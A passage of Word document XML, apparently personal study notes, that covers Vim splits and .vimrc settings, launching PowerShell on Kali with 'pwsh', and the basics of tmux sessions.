    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch between files: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:bnext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:bprev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View splits:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Horizontal split: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:split filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vertical split: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:vsplit filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate splits: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">h/j/k/l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B99">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Customization (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.vimrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in your home directory for custom settings. Example:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> set number       " Show line numbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set tabstop=4    " Set tab width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set expandtab    " Use spaces instead of tabs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Practice Resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="24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vimtutor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vimtutor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your terminal) to practice interactively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try out HackTheBox challenges and note commands you see frequently.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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A4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This guide provides the essentials without being overwhelming. Practice each section gradually to build confidence with VIM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q0f71ihxfyyj" w:id="549"/>
      <w:bookmarkEnd w:id="549"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to switch from terminal to powershell in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwsh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l5nfhs1l782m" w:id="550"/>
      <w:bookmarkEnd w:id="550"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAF">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Guide to Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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(terminal multiplexer) is a powerful tool for managing multiple terminal sessions within a single window. It's especially useful for developers, sysadmins, and anyone who works extensively in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1443"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Debian/Ubuntu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sudo apt install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1443"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Hat/CentOS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sudo yum install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1443"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS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brew install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1443"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows</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via WSL (Windows Subsystem for Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Starting and Attaching Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a new session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This creates a new session and opens a </w:t>
      </w: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window.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a new session with a name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux new -s my_session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-s" stands for session name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List all sessions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reattach to a session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux attach -t my_session</w:t>
      </w:r>
    </w:p>
